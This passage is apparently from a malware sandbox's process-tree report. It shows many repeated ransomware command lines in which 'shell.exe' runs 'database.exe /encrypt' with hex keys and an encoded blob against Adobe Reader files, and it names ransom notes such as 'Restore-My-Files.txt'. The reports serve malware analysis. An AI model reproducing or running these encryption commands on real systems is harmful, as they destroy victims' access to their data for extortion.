                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:2680
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:5880
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:3292
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:3968
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:5400
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6684
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6964
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:2936
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6328
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:2400
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:7112
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:2632
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#Decrypt_Files_ReadMe#.rtf.gif"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4540
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\PmK9LCHm-9WRFYrHO.[[email protected]].gif"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6772
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6520
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:1652
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:3972
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                    PID:208
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:944
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:6788
